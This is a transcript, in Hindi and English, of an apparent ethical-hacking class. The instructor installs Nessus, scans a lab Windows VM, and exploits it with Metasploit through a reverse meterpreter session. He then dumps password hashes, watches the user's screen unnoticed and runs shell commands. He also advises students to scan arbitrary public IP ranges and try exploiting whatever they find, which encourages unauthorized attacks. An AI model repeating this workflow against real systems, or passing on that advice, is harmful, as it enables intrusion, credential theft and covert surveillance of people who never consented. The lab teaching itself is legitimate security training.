ओके, सो आज हम करने वाले हैं वर्नेबिलिटी स्कैनिंग। और टूल कौन सा यूज़ करेंगे हम लोग यहाँ पे? नेसेस। ओके, थोड़ा लैब सिनेरियो समझ लीजिए। ये आपका सर्वर, लेट्स से ये हमारा काली का मशीन है और यहाँ मैं इंस्टॉल करूँगा नेसेस। अब नेसेस के थ्रू हम लोग क्या करेंगे, इन सिस्टम्स की किसी भी एक सिस्टम की वर्नेबिलिटी निकालेंगे और वर्नेबिलिटी निकालने के बाद हम लोग मेटास्प्लॉइट के थ्रू उसको एक्सप्लॉइट करेंगे। क्लियर है? यस सर। स्टार्ट होने दो इसे। अभी हम लोग करते हैं क्रॉलिंग। ये फर्स्ट टाइम हमने इंस्टॉल किया है मशीन, तो बाय डिफ़ॉल्ट काली काली यूज़र नेम रहता है। मैं रूट पे पासवर्ड सेट कर लेता हूँ जैसे। ओपन टर्मिनल, sudo su, type here existing user's password, that is called Kali. Okay, now अब हमें रूट पे पासवर्ड सेट करना है। सो passwd रूट और पासवर्ड ये हम लोग रूट डाल देंगे। init run control D root okay, so open browser, इंटरनेट आपके पास अवेलेबल होना चाहिए। ओपन गूगल एंड टाइप हियर डाउनलोड नेसेस फॉर और आपने इस पहली ही वेबसाइट टेनिबल को ओपन करना है। नीचे ड्रैग करना है इसको जहाँ पे आपको मिले। यहाँ पे देखो अलग अलग ऑपरेटिंग सिस्टम के लिए बता के रखा हुआ है। सो हमें सर्च करना है विच इज़ अवेलेबल फॉर काली, सो यू कैन जस्ट सेलेक्ट हियर काली ऑपरेटिंग सिस्टम, ubuntu yes, Kali Linux, that is i386 and that is for 64 bit here, this one यहाँ पे 64 bit लिखा ना x64, that is your 64 bit Linux. So click on that, agree, save this, okay. Now open here Terminate email address.
ये हमें एक्टिवेशन के लिए की रिक्वायर्ड होगा यहाँ पे, एंड दैट की इट विल बी सेंड टू योर ईमेल आईडी। तो यहाँ पे आप अपना भी ईमेल आईडी यूज़ कर सकते हैं, डजेंट मैटर, और यहाँ पे आप 10 मिनट ईमेलर भी यूज़ कर सकते हैं। तो मैं लिखता हूँ 10 मिनट ईमेल, कोई भी एक लिंक ओपन कर लो आप। Great. And my Nessus installer is already downloaded here. Okay, click on that. Yes, then right click, open terminal. आप वहाँ से भी जा सकते हैं, डाउनलोड CD डाउनलोड्स में करके मैंने डायरेक्टली यहीं से ओपन कर लिया। देन LL, तो यहाँ पे हमारा Nessus ऑलरेडी है, तो Nessus को यहाँ पे अभी सिर्फ रीड का राइट है। वी हैव टू गिव हिम द फुल परमिशन, chmod 777 Nessus enter and verify the permission. You will see it has the complete permission now. It's a .db package. यहाँ पे लिखो dpkg -i Nessus. Yes. Now it is give the instructions like your scanner is installed successfully here. Now if you want to access it, first you have to start the service for Nessus, and there is a command systemctl start Nessus service, or you can just type here start service Nessus NESSUSD start. Service is started successfully, and this is your login link through which you will be access this Nessus through web browser. So आपने यहाँ से कॉपी करना है इसको, एंड ब्राउज़र पे जाना है और कोई भी एक ब्राउज़र में इसको पेस्ट करना है। तो यहाँ पे काली और 8834 इसका पोर्ट नंबर जिससे एक्सेस होगा। एडवांस्ड, नाउ accept risk and continue. So finally you are access your Nessus. So it is initializing the services first. It will take time, just wait. Okay, then Nessus essential, then continue. ओके, अब यहाँ पे हमने को रजिस्ट्रेशन करना, तो किस लिए क्या की, तो क्या किया हमें, क्या चाहिए यहाँ पे गेट एक्टिवेशन कोड, किस चीज़ का, नेसेस का। सो आई एम जस्ट पुटिंग हियर जॉन, यू जस्ट टाइप हियर एनी नेम, पुटिंग हियर सोहित भाटी
and type here the mail which we have open here in 10-minute emailer. Okay, so copy that and go to terminal and type here email, then email the code. Okay, code is sent to your email, Queen email address. So go to your 10-minute emailer and refresh this. Yes, you will get our email address from the Nessus. Activation code here, just wait, and here the email, click on that and this is your code. Let's copy from here, go to Nessus setup and paste that code, then continue. अभी आपसे मांग रहा है कि जब आप इसको नेक्स्ट टाइम यूज़ करोगे तो यू शुड रिक्वायर ए यूज़र नेम और ए पासवर्ड. तो मैं यहाँ पे देता हूँ एडमिन एंड एडमिन. So that username and password you will be used whenever you will be access this Nessus, or whenever you scan any network or a device via this tool. So I'm going to click on admit, save this and submit it. Now it's installing all the plugins, right? Here it will take time. Once you install that, or once it installed or download and install all the plugins, it will take time near about 40 to 50 minutes. That is depend on your internet. फिर उसके बाद आपने फिर से आपका ब्राउज़र ओपन करना है और जो यूज़र नेम आपने यहाँ पे डिफाइन किया था एडमिन उसी से लॉगिन करना है. क्लियर है यहाँ तक? यस सर. यस सर. सो मैंने ऑलरेडी ये सारी चीज़ें करके रखी हुई हैं, मुझे सिर्फ आपको प्रोसेस बताना था. मैं इसको क्लोज करता हूँ, इसको मिनिमाइज कर लेते हैं, कोई प्रॉब्लम नहीं. नाउ जो मेरा प्रीवियस कालिका मशीन है इसको ओपन करता हूँ जहाँ पे मैंने नेसेस को स्क्रीनशॉट लिया हुआ है. ये इंस्टॉल करता रहेगा, कोई दिक्कत नहीं है. root Nessus. Open terminal, start service first. Service, Nessus, start. Open web browser and type here this address https kali / kali and port number, then type enter.
पे टाइप हियर admin whatever the username and password you have defined there, then sign in. Remember this. आपकी अपनी मशीन है वर्चुअल मशीन, तो आप उसको सेव कर सकते हैं, लेकिन लाइव एनवायरनमेंट में आपने कभी भी कोई भी क्रेडेंशियल सेव नहीं करने होते। ओके, ये आपका नेसेस का इंटरफेस है। नाउ क्लिक ऑन न्यू स्कैन। यहाँ पे देखो बहुत सारे ऑप्शंस आपको मिलेंगे, तो कुछ यहाँ पे मतलब अपग्रेड करने पड़े, यानी कि जो आपको परचेज़ करना पड़ेगा, ये कुछ फ्री है। तो आपने क्या कर, देखो यहाँ से आप स्कैन भी कर सकते हैं। हॉस्ट डिस्कवरी जो है स्कैनिंग का पार्ट है, आपको एनवेब से नहीं करना तो यहाँ से स्कैन कर सकते हैं। आपको हमेशा क्या करना है, एडवांस स्कैन पे जाना है, क्लिक ऑन दैट। और जो भी आपने एनमैप से मशीन स्कैन की थी ना, कौन कौन सी मशीन लाइव है, उस मशीन का आपको आईपी डिफाइन कर देना है स्कैनिंग में। सो मैं एक बार फिर से स्कैन कर लेता हूँ एनमैप 20.0.0.0, जिसका आईपी तो हमने चेक ही नहीं किया, आईपी IF कॉन्फ़िग, ये प्रॉब्लम है। देखो इसका फिर से आईपी चेंज हो गया। So let me change this address first. या तो मशीन रिबूट कर लो या फिर आपका नेटवर्क इंटरफेस का रिबूट कर लो। नेटवर्क इसको एडिट करो, कैंसिल कर, डबल क्लिक, सेटिंग्स, ये आपका है, सॉरी इंटरफेस को नहीं करता हूँ, ये इंटरफेस है, इसको मैं रिमूव करता हूँ। देन ऐड वन मोर इंटरफेस, क्रिएट, देन सेव। IPv4 को क्या करना है, ऑटोमेटिक करना है यहाँ पे DHCP से, देन सेव इट। आपको पहले आईपी देख लेना कि आपने जो वर्चुअल नेटवर्क में आईपी डिफाइन किया हुआ है उससे आपको आईपी मिल रहा है कि नहीं मिल रहा है। मुझे पता है कि मैंने अपने वर्चुअल नेटवर्क में या वर्चुअल लैब में 20 की सीरीज़ का आईपी दिया हुआ है, और यहाँ पे मुझे मिला था 192 का, तो मुझे चेंज ही करना था। अगर नहीं है आपके पास, मतलब आपका सेम है, तो आपको कुछ करने की ज़रूरत नहीं। तो अभी मैं फिर से क्या करता हूँ, IP कॉन्फ़िग, हमें IP यहाँ पे IP क्यों नहीं उठाया इसमें, वेट, पावर ऑफ दिस, रिकॉर्डिंग चल रही है, अलग से रिकॉर्डिंग चल रही है, समझ छोड़ो, अभी मत लेना। मैं इसको फिर से क्या करता हूँ, फिर से इसको रिसेट करें, क्रिएट, ऑटोमेटिक सेव, ओके, टाइप हियर IF कॉन्फ़िग। अभी देखो इसको आईपी मिल गया 130 में, ठीक है। ये क्यों नहीं मिल रहा था, रीज़न ये था कि दोनों मशीनें मैंने एक ही जिप फाइल से एक्सट्रैक्ट किए, तो दोनों का सिस्टम आईडी सेम दिखा रहा है। तो इसलिए वो क्या कह रहा है कि दो सेम आईडी की दो सेम सिस्टम आईडी की मशीन आप लोग वर्चुअल मशीन में अगर रन करोगे तो वो एक को ना रन नहीं करने देगा, मतलब उसको सर्विसेज नहीं देगा, इसलिए मैंने इसको ऑफ कर दिया। अभी 130 आ गया, तो मैं इसमें पहले टारगेट डिफाइन कर लेता हूँ। तो nmap
20.0.0.0/24 का नेटवर्क में स्कैन कर ले रहा हूँ। राइट, इतनी सारी आपको ये डिटेल दे दिया इसने। एक 220 मशीन है, एक 131 मशीन है। राइट, दो मशीन आपकी लाइव है। ओएस डिफाइन कर लो यहाँ पे 220-O। ओके, दूसरा मशीन है 131। वो 130 है, सॉरी 130 है तो 131 है। इतना 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 एक सेकंड। 131 ठीक है, 131 इस मशीन का आईपी है। सो अभी क्या करना है, हमने नेसेस पे जाना है और यहाँ पे आईपी डिफाइन कर देना 131। मैं इसको स्कैन करूँगा तो आपकी जो भी मशीन है, जो भी मशीन का आईपी है, मैं इसको स्कैन डाल देता हूँ। न्यू स्कैन, यू कैन डिफाइन हियर द नेम एंड देयर आईपी एड्रेस 20.0.0.131। देन सेव दिस। एक स्कैन सेव कर लिया आपने, उसके बाद आपने क्या करना है, यहाँ से स्टार्ट कर देना है इस स्कैन को, सिंपल। तो जैसे ही ये स्कैन कंप्लीट होगा आपको एक रिपोर्ट मिल जाएगी। राइट, थोड़ा टाइम लेगा स्कैन करने में। मैंने ऑलरेडी ये स्कैन किया हुआ है, तो ये एक प्रीवियस रिपोर्ट है इस मशीन की। मैं इसको ओपन करता हूँ। देखो आप, इसने स्कैन किया तो वर्नेबिलिटी की लिस्ट दे दी। ये होस्ट है, होस्ट की डिटेल है, वर्नेबिलिटी की डिटेल है। तो वर्नेबिलिटी पे क्लिक करना है और यहाँ पे इसने चार्ट भी दिया है। देखो क्रिटिकल का कौन सा, जो जिसका कलर रेड है वो क्रिटिकल है, हाई है वो ऑरेंज है, येलो कलर पे लो है, एंड इन्फॉर्मेटिव जो आपकी इन्फॉर्मेशन है नॉर्मली जो सबसे लोवेस्ट सिवियरिटी है जिसकी वो आपका ग्रीन कलर की है। तो यहाँ पे मिक्स मोड वाला जो है इसको आप क्लिक कर लो, ये वाला, एंड दीज आर द वर्नेबिलिटीज़। और ये वर्नेबिलिटी के कोड होते हैं। देखो MS06040, MS09011, MS08067। तो आप किसी भी कोड पे क्लिक कर लो, मैं यहाँ पे क्लिक करता हूँ। देखो अब ये देखो डिटेल दे रहा है इसका। क्या डिटेल दे रहे हैं, दिस रिमोट विंडोज हैज़ इट्स अफेक्टेड बाय द रिमोट कोड एग्जीक्यूशन वर्नेबिलिटी दिस सर्वर और सर्विस ड्यू टू इम्प्रॉपर हैंडलिंग RPC रिक्वेस्ट। ये क्या बोल रहा है, ये आपका एक वर्नेबिलिटी है जो आपके सिस्टम को रिमोट कोड एग्जीक्यूशन करा सकता है। इसका ये फिक्स करना है, तो इसका ये आपको अपडेट करना पड़ेगा। अब यहाँ कुछ डिटेल दी है। देखो इसमें मेन है आपका पर्पज़ एक्सप्लॉइट ढूंढने का। अब ये दिखा रहा है एक्सप्लॉइट विद, द मीनिंग ऑफ दैट ये बता रहा है कि ये जो बग निकाला है आपने फाइंड आउट करके, ये वर्नेबिलिटी जो निकाली है, इस वर्नेबिलिटी का एक्सप्लॉइट कौन से टूल में अवेलेबल है। तो यहाँ पे मेटास्प्लॉइट लिखा हुआ है, रिलेटिव पाथ, स्टैक, कैनवस, ये और कोर इम्पैक्ट। देखो ये कुछ आपके टूल हैं, कोर इम्पैक्ट है, कैनवस है, और ये आपका मेटास्प्लॉइट है। ये वो टूल हैं जिनकी हेल्प से आप इस सिस्टम को बैकडोर एंट्री कर सकते हैं। तो इस तरह से आपने रिपोर्ट निकालनी होती है। अब ये रिपोर्ट अगर आपने डाउनलोड करनी है तो क्या करना है, सीधा रिपोर्ट पे क्लिक कर, देखो ये रिपोर्ट है आपका, ये रहा रिपोर्ट, जनरेट
चलो पहले पीडीएफ फाइल में चाहिए अपने को HTML या CSV, हमें पीडीएफ में चाहिए, तो हमने क्या किया जनरेट, ये रिपोर्ट सेव कर लीजिए आप। एक बार फिर से डिटेल्ड, ये हमने डाउनलोड किया और ये वल्नरेबिलिटी रिपोर्ट आप ओपन कर लीजिए। इस तरह से रिपोर्ट जनरेट करके देता है आपको। आपने इसको नीचे आना है और इसको देखो यहाँ पे सारे वल्नरेबिलिटी से रिपोर्ट आ जाए। दूसरी रिपोर्ट भी सेव कर लेता हूँ मैं, वल्नरेबिलिटी बाय होस्ट, ये देखो सर कंप्लीट नहीं दिया इसमें, तो मैंने डिटेल्ड वाली भी डाउनलोड की है, ये रहा। ये आ गई आपको डिटेल में, ठीक है। इस तरह से आपको रिपोर्ट मिलती है। आप सारी सेलेक्ट कर लोगे तो सबकी डिटेल रिपोर्ट दे देगा। ये देखोगे एक्सप्लॉइट विद कैनवस, कोर इम्पैक्ट और मेटास्प्लॉइट। इसका सॉल्यूशन भी साथ में दिया है, इसका वो भी देखो MS07068, ये वल्नरेबिलिटी हमने फाइंड आउट की थी। ये दूसरी वल्नरेबिलिटी है देखो, राइट। इस तरह से वल्नरेबिलिटी रिपोर्ट मिलती है। अब हमारा काम क्या है कि भाई अब ये वल्नरेबिलिटी तो हमें मिल गई ना, हाउ कैन वी एक्सप्लॉइट द सिस्टम। तो उसके लिए आपको एक टूल यूज़ करना पड़ेगा, मेटास्प्लॉइट। तो मेटास्प्लॉइट क्या है बेसिकली, मेटास्प्लॉइट एक कंप्लीट फ्रेमवर्क है, यानी कि इस टूल के अंदर आपको बहुत सारे एक्सप्लॉइट और उनके और पेलोड्स ऑलरेडी प्री क्रिएटेड मिलेंगे। आपने जो वल्नरेबिलिटी फाइंड आउट की है, इस कोड को आपने सर्च करना है वहाँ पे, क्या ये कोड वहाँ पे आपको इस कोड का अगेंस्ट कोई एक्सप्लॉइट मिलता है कि नहीं मिलता है। तो आपने क्या करना है, यहाँ से कॉपी पेस्ट कर लेना है इस कोड को और मेटास्प्लॉइट रन करना है। मेटास्प्लॉइट रन करने के लिए कमांड है MSF console। यहाँ पर देखो MSF console, ये अपने आप में बहुत बड़ा टूल है। इससे आप स्कैनिंग कर सकते हैं, इससे आप जो है DDoS अटैक परफॉर्म करा सकते हैं इस टूल से आप जो है सिस्टम हैकिंग कर सकते हैं, मोबाइल का आप जो है हैकिंग करा सकते हैं। इससे ये काफ़ी बड़ा फ्रेमवर्क, अपने आप में बहुत बड़ा टूल है। मतलब ये इट्स नॉट ए टूल, इट्स ए कंप्लीट पैकेज ऑफ डिफरेंट एक्सप्लॉइट, डिफरेंट पेलोड्स एंड डिफरेंट योर ऑक्सिलरीज। तो जैसे आप इसको रन करोगे, ये आपको पूरी डिटेल दे देगा, इसके अंदर कितने एक्सप्लॉइट्स हैं, कितने पेलोड हैं, कितने नॉब्स हैं, देन कितने आपके जो है ऑक्सिलरीज हैं। सर ये बाय डिफॉल्ट इसके अंदर ही मिलता है क्या हाँ, सर? बाय डिफॉल्ट होता है लिनक्स इसका, के। लिनक्स के लिए by default। ओके। हाँ, अब ये इसके बैनर, ये सिर्फ बैनर है इसका, इसमें बहुत सारे बैनर आप चेंज भी कर सकते हैं। ये देखो माइक्रोसॉफ्ट, ये सॉरी मेटास्प्लॉइट V6.1 इतना है, और इसमें देखो 2162 एक्सप्लॉइट्स हैं, 1147 ऑक्सिलरी हैं, पोस्ट हैं और पेलोड हैं। ये वो सारे प्रोग्राम हैं जो आपको हैकिंग में हेल्प करेंगे। यानी कि एक्सप्लॉइट करने के लिए जो प्रोग्राम की रिक्वायरमेंट होती है, आपको डेवलपमेंट करने की जरूरत नहीं, आपको प्री डेवलप्ड मिलते हैं इसमें, राइट। आगे तो क्वेश्चन मार्क डालोगे तो आपको सारी की सारी डिटेल मिल जाएगी, कैसे यूज़ करना है, किस तरह से यूज़ करना है। ये देखो, ठीक है। बैनर लिख रहा है Yes, डिस्प्ले sir. एंड द ऑसम मेटास्प्लॉइट बैनर
CD करोगे तो चेंज द करंट वर्किंग डायरेक्टरी, कलर्स चेंज करना है, ये तो खैर नॉर्मल है। अब मैं यहाँ पे देखो बैनर लिखता हूँ, बैनर, तो इसका ना ये बैनर चेंज हो जाता है, हो रहा है ना। राइट, ये देखो। अब हमें यूज़ कैसे करना है इसका? सबसे बड़ा यूज़ करने का तरीका क्या है इसका? आप सीधा क्या करो, जो आपने कोड मिला है, जो वर्नेबिलिटी मिली है, उसमें अगर वर्नेबिलिटी की रिपोर्ट में उसमें लिखा है कि ये वर्नेबिलिटी मेटास्प्लॉइट में अवेलेबल है, तो आप सीधा मेटास्प्लॉइट रन करो और यहाँ पे लिखो सर्च और वो कोड पेस्ट कर दो सिर्फ। अगर इसके अगेंस्ट कोई एक्सप्लॉइट इसमें होगा तो ये आपको शो करा देगा। राइट, अब देखो उसने क्या बोला, एक्सप्लॉइट विंडोज SMB MS07068, ये मिल गई है आपको। इसका जो रैंक है ग्रेट है, इसका एक्सीलेंट है, इसका ग्रेट है, तो ये बता रहा है माइक्रोसॉफ्ट सर्वर सर्विस रिलेटिव पाथ। अब आपने ये वाला एक्सप्लॉइट यूज़ करके सिस्टम को एक्सप्लॉइट करना है। राइट, नीचे कुछ इंस्ट्रक्शन भी दी हैं, जब भी आप कोई टूल यूज़ करो उसके इंस्ट्रक्शन ज़रूर पढ़ लेना। अभी बोल रहा है अगर आपको इसको यूज़ करना है, इस एक्सप्लॉइट को अगर आपने एग्जीक्यूट कराने के लिए लोड करना है, तो आपने क्या करना है, सीधा यूज़ 1 लिखो या फिर यूज़ लिखने के बाद पूरा आप ये टाइप कर लो। तो मैं क्या करता हूँ, यूज़ 1, सॉरी यूज़ 0, मुझे 0 करना था फर्स्ट वाला। मैं लिखता हूँ बैकग्राउंड, तो मैं वापस आ जाऊँगा, मैं फिर से सर्च करता हूँ यहाँ पे। सर हाँ जी, सर जिसका रैंक एक्सटेंड बताया गया है हम उसे क्यों नहीं प्रेफर करते? आप कर सकते हैं, करके देख लीजिए, कोई दिक्कत नहीं। अच्छा, तो ये तो सिर्फ एक ही है, अगर इसमें 50 आएंगे तो 50 थोड़ा ना करोगे, जिसका ग्रेड रहेगा ना वो करना है आपने। आप करके देख सकते हैं, कोई इशू नहीं है, ठीक है ना। जिससे एक्सप्लोइट हो जाए वो आपके लिए अच्छा है। इसने तो अपनी रेटिंग के सर हिसाब से बताया हुआ है। सर उसमें जो चेक चेक वाला वो पार्ट है उसमें ग्रेड के आगे जैस लिखा है और एक्सीलेंट के आगे नो, वो क्या चीज है? ये चेक है कि कौन सा एक्सप्लोइट आपका ज़्यादा वर्क करेगा, ठीक है। ये पैरामीटर सेट किए हुए हैं चेक करके, तो आपने ओके। जिसका ग्रेट होता है ना रैंक, वही यूज़ करना है। तो मैं यूज़ 0 कर लेता हूँ। अभी यूज़ 0 करने के बाद आपका देखो लोड हो गया ना। यस सर। अब यहाँ पे होता है मेन काम। मेन काम क्या, अब यहाँ पे हमें डिफाइन करना होता है। देखो क्या, ये आपका काली का मशीन है, आपने एक्सप्लॉइट इस पर लोड कर लिया, एक्सप्लॉइट लोड कर लिया। अब इसको बताना होता है कि भाई साहब आप जिस मशीन को टारगेट करोगे उसका आईपी क्या है, कौन सी मशीन पे एग्जीक्यूट कराना है, राइट, कौन से पोर्ट के थ्रू एग्जीक्यूट कराना है, ओपन पोर्ट कौन सा है जिस पे आप एग्जीक्यूट कराओगे। देन जब ये कोड एग्जीक्यूट होगा तो रिवर्स में यहाँ से बैकडोर का कनेक्शन कौन सी मशीन को देगा, काली को मिलना चाहिए ना जिस पे हमने रन किया है। तो इसको हमें डिफाइन करना पड़ता है, यानी कि हमें क्या डिफाइन करना पड़ता है, आर होस्ट, एल होस्ट एंड पोर्ट। आर होस्ट रिमोट होस्ट, जिस मशीन पे ये एग्जीक्यूट होगा, तो ये हमारा वो टारगेट मशीन है जिस पे हमें एग्जीक्यूट कराना है, ये वाला। तो इसका आईपी आएगा आर होस्ट में, जिस मशीन में रिवर्स कनेक्शन चाहिए उसका आईपी आएगा एल होस्ट में, लोकल होस्ट में, यहाँ पे काली का आईपी आएगा। और एक पोर्ट नंबर डिफाइन कर दो जिस पोर्ट के थ्रू आप ये रिवर्स कनेक्शन लोगे, राइट। तो यहाँ पे सेट कर लो। तो हमारी लैब के हिसाब से हमारा जो काली का आईपी है वो 130 है, और जो टारगेट मशीन का आईपी है वो 131 है, ठीक है। तो यू कैन डिफाइन हियर ऑप्शंस। अब ये पूछ रहा, देखो इसने एल होस्ट तो ले लिया 130,
पोर्ट ले लिया 444 और आर पोर्ट रिमोट पोर्ट जिस पे वो एग्जीक्यूट होगा 445 ले लिया। यहाँ पे आर होस्ट सेट नहीं है, यानी कि टारगेट सेट नहीं है। यहाँ पे लिखो सेट सेट आर होस्ट 20.0.0.131 देन एंटर। सर टी होस्ट लिख दिया आपने। हाँ वो चेक कर रहा हूँ, नहीं है तो यहाँ पे सेट आर होस्ट 20.0.0.131 एंटर। देन चेक हियर ऑप्शंस अगेन। सेट हुआ कि नहीं, देखो सेट हो गया हमारा। यस सर। और ये क्या किसके लिए सेट हुआ है, देखो ये हमारा पेलोड है जो आपको मीटर पीटर देगा इसको रिवर्स टीसीपी कनेक्शन में। ये आपका एक्सप्लॉइट है जिसके थ्रू ये एक्सप्लॉइट है जिसके थ्रू रिवर्स कनेक्शन देगा मीटर पीटर के थ्रू। तो जब आप इसको एक्सप्लॉइट करोगे तो आपको इसका मीटर पीटर मिलेगा। यहाँ पे अगर मीटर पीटर आया तो आपने सक्सेसफुली सर आपकी आवाज नहीं आ रही सर। आवाज़ किसी को नहीं आ रही है, तुम्हें नहीं आ रही बस? आ रही है सर। नहीं आ रही सर। नहीं आ रही है, आप दोबारा ज्वाइन कर लो, कोई दिक्कत नहीं है, सबको आ रही है आवाज़। यस सर। ठीक है, तो अभी हमने क्या करना है कि इतना सेट करने के बाद आपने सिर्फ एक सिंगल कमांड चलानी है और जो टारगेट आपने डिफाइन किया है यहाँ पे उस मशीन का आपको मीटर पीटर मिल जाएगा। हम यहाँ पे करते हैं इसको एग्जीक्यूट। उसके लिए क्या करना है, सिर्फ एक्सप्लॉइट लिखना है। देन एंटर। टीसीपी हैंडलर चला 130 पे, 444 पोर्ट है 131 है 145 पे। ये देखो मिल गया रिवर्ट मीटर पीटर आपको। दैट मीन्स आपने उस मशीन को सक्सेसफुली कॉम्प्रोमाइज़ करना है, ये वाली मशीन को। ठीक है, अभी आपने क्या करना है, वेरीफाई करने के लिए इसको लिखो। अब यहाँ क्वेश्चन मार्क लिखो। देखो आपको सारे मीटर पीटर के बाद जो भी कमांड आपको चलानी है वो सारी आपको शो कर देगा। सिस्टम के रिलेटेड है, पासवर्ड इसके डंप करने हैं, एलिवेट कमांड यानी कि यहाँ पे गेट सिस्टम करना है, प्ले साउंड करना है उसके सिस्टम पे, मैसेज सेंड करना है, सारी चीज़ें आपको मिल जाएगी यहाँ पे। देखो उसका कैमरा रिकॉर्ड करना है, माइक रिकॉर्ड करना है, ये माइक चैट देखनी है उसकी उस सिस्टम की, सब आपको यहाँ पे मिल जाएगी। ये कुछ सिस्टम रिलेटेड कमांड्स है। ऊपर यूज़र इंटरफेस, ये आपकी सिस्टम कमांड है। और ऊपर जो है आपकी नेटवर्क कमांड है, ये वाला आईपी कॉन्फ़िग चेक करना है, नेट स्टेट चेक करना है, राइट। आर्प हिस्ट्री देख एआरपी जो है देखनी है आपको, प्रोटोकॉल आर्प कैशे, ये देखो पूरी कमांड्स है। डिस्क्रिप्शन सामने दिया है, शटडाउन करना है, रिस्टार्ट करना है, सेशन देखना है, किल करना है, सारी चीज़ें यहाँ पे। अब हमने एक्सप्लॉइट तो कर लिया, हमें वेरीफाई करना है कि हमने कौन सा मशीन को एक्सप्लॉइट किया है। तो यहाँ पे आप क्या लिखो, सिस्टम इन्फो। सिस इन्फो आएगा, सिस इन्फो, देन एंटर। ये आपको बता रहा है कि आपने एडमिन, कंप्यूटर का नेम है एडमिन, उसका आईडी है, ओएस ये है, आर्किटेक्चर x64 है, राइट। इसके अंदर 2 यूज़र है, डोमेन में है या नहीं है ये आपका एमएस होम है, यानी कि ये मशीन आपकी वर्क ग्रुप में है, डोमेन में नहीं है। लैंग्वेज इंग्लिश है। अब और क्या करना है, हमें इसके पासवर्ड निकालने हैं, मतलब हैशेस निकालने हैं। तो मैं करता हूँ हैश डंप। ये देखो ये हमने हैश डंप कर लिया, यानी कि जो यूज़र थे वहाँ पे उनके हैश डंप हो गए। भाई आवाज़ कम कर ले, लेक्चर रिकॉर्ड हो रहा भैया। शिवम आवाज़ कम करे, लेक्चर रिकॉर्ड हो रहा है।
ओके। अब आपने इसका रिमोट डेस्कटॉप लेना है, आपने देखने को यूज़र कर क्या रहा है। अब देखो इस चीज़ का ना यूज़र इसको पता नहीं चला है बिल्कुल भी कि ये लोग क्या कर रहे हैं मेरे सिस्टम में। यहाँ देखो ये नॉर्मल अपना काम कर रहा है, कोई दिक्कत नहीं, कोई प्रॉब्लम नहीं है, ठीक है। वो अपना फाइल्स यूज़ कर रहा है, फोल्डर यूज़ कर रहा है, अपना फाइल्स मतलब जो भी टास्क उसको परफॉर्म करने के लिए दिया है वो काम कर रहा है। अब मुझे क्या करना है, ये देखना है कि वो सिस्टम पे क्या कर रहा है। तो मैं यहाँ पे क्या करता हूँ, गेट सिस्टम देन एंटर। अच्छा, क्वेश्चन मार्क, स्क्रीन शेयर आएगा, देन एंटर। आ गया डेस्कटॉप उसका, यही फाइल ओपन थी ना। यस सर। वो जो भी बंदा करता रहेगा आपको दिखता रहेगा। ठीक है, मैं अभी देखता हूँ क्या शो कर रहा है। तो ये फाइल जो ओपन हुई है ना, ठीक है, जो भी वो एक्टिविटी करेगा आप उसको देखते रहिए। क्लियर है? यस सर। यस सर। इसको क्लोज करते हैं यहाँ से। अब आपने क्या करना है, कोई और मशीन को क्या करना है, रिमोट मतलब उसको बैकडोर एंट्री क्रिएट करनी है। तो यहाँ पर लिखो बैकडोर, मतलब बैकग्राउंड कर लो इसको, ये सेशन आपका बैकग्राउंड में चलता रहेगा। दूसरा एक्सप्लोइट सर्च कर लो, वर्नेबिलिटी निकालो, एक्सप्लोइट सर्च करो, कनेक्ट कर लो। यहाँ पे आप देखो सेशंस, ये बता देगा कि आपका ऑलरेडी कोई सेशन बन रहा है कि नहीं। पहला ये देखो, ये आपने एक मशीन का सेशन ऑलरेडी यहाँ पे दिखाई रहा है, राइट। और इसको कनेक्ट करना है तो सेशन 1 आ गया मीटर पीटर आपका। आपने अगर यहाँ पे प्रॉब्लम हो रही है तो आप क्या लिख सकते हैं, शेल लिख सकते हैं, यानी कि आपको कमांड प्रॉम्प्ट मिल जाएगा सिस्टम का। ये बता दिया उसने कि एक्सपी का कमांड, यहाँ पे लिखो dir ip config cd बैकस्लैश cd डॉट डॉट से बाहर निकल जाओ, cd डॉट डॉट, और यहाँ पे mkdir आपको एक डायरेक्टरी बनानी है वहाँ पे, उसको बिना बताए मैं बना देता हूँ इसमें राम सिंह, राइट। dir करो राम सिंह, यहाँ पे ऑलरेडी बनी हुई है देखो ये, और यस सर। वेरीफाई कर लो जाके क्या कोई डायरेक्टरी बनी है सी ड्राइव में। माय कंप्यूटर, शो कंटेंट, राइट। डिलीट करनी है फाइल rm dir राम सिंह, अरे rm सर ओनली आरएम होगा ना? rm rm रिकॉर्डिंग में है, रिमूव कमांड है इसकी rm हाइफन rm dir तो है रिमूव डायरेक्टरी। यस सर।
गया यार, रिमूव हो गया शायद, हो गया रिमूव, चेक कर लेते हैं। हाँ हो गया रिमूव, राइट। इस तरह से अब आप प्रोग्राम के अंदर जा सकते हैं। डॉक्यूमेंट्स, आपको बस लोकेशन का पता होना चाहिए, कौन से लोकेशन पे क्या फाइल रखी है, कौन सी डिलीट करनी है, कहाँ पे क्या अपलोड करना है। ओके, ओके सर। और क्या कर सकते सर हैं? एक हाँ बोलो। मैं ये पूछ रहा था सर, जैसे ये जो हमने स्कैनिंग की है सर, ये एक्सप्लोइट किया है, तो सर ये मतलब इंट्रानेट वगैरह सर, ये या फिर इंटरनेट में है ये देखो, अब आप यहाँ समझो कि इंटरनेट पे कैसे जाओगे आप। अगर आपके सिस्टम में पब्लिक आईपी है डायरेक्टली, तो आप यहाँ से इंटरनेट पे पब्लिक आईपी को सर्च कर सकते हैं। और ये जो आपका आईपी हम लोग यूज़ कर रहे हैं, ये इंट्रानेट का है। पब्लिक और प्राइवेट आईपी का डिफरेंस समझ लेना पहले। तो पब्लिक आईपी आपको अगर पूरा इंटरनेट पे यूज़ करना है, तो आपको स्टैटिक आईपी रखना पड़ेगा अपने सिस्टम में, जो डायरेक्टली इंटरनेट पे रीचेबल है। तो आप क्या करो, कोई भी एक सीरीज़ को स्कैन करना स्टार्ट कर दो। वहाँ पे अगर कोई आपको मिलता है सिस्टम जिसको जो पब्लिक आईपी पे चल रहा है, उसको सर्च करो, उसको स्कैन करो, फाइंड आउट करो, एक्सप्लोइट करके देखो। ओके यहाँ सारा आईपी का खेल है। जी सर। अब देखो यहाँ नेक्स्ट क्या आता है। अभी हमने कौन कौन से फेज कर लिए? हमने फेज कर लिए हैं स्कैनिंग, इंफॉर्मेशन गैदरिंग, स्कैनिंग, गेनिंग एक्सेस कर लिया हमने, राइट। अभी हमने क्या करना है, मेंटेनिंग एक्सेस। तो मेंटेनिंग एक्सेस करने के लिए हमें क्या करना पड़ेगा, एक्सप्लॉइट इंस्टॉल करना पड़ेगा वहाँ पे। तो मैं आपको बता दूंगा कि कैसे करते हैं। अभी हमने क्या करना है, कवरिंग ट्रैक्स करना है। 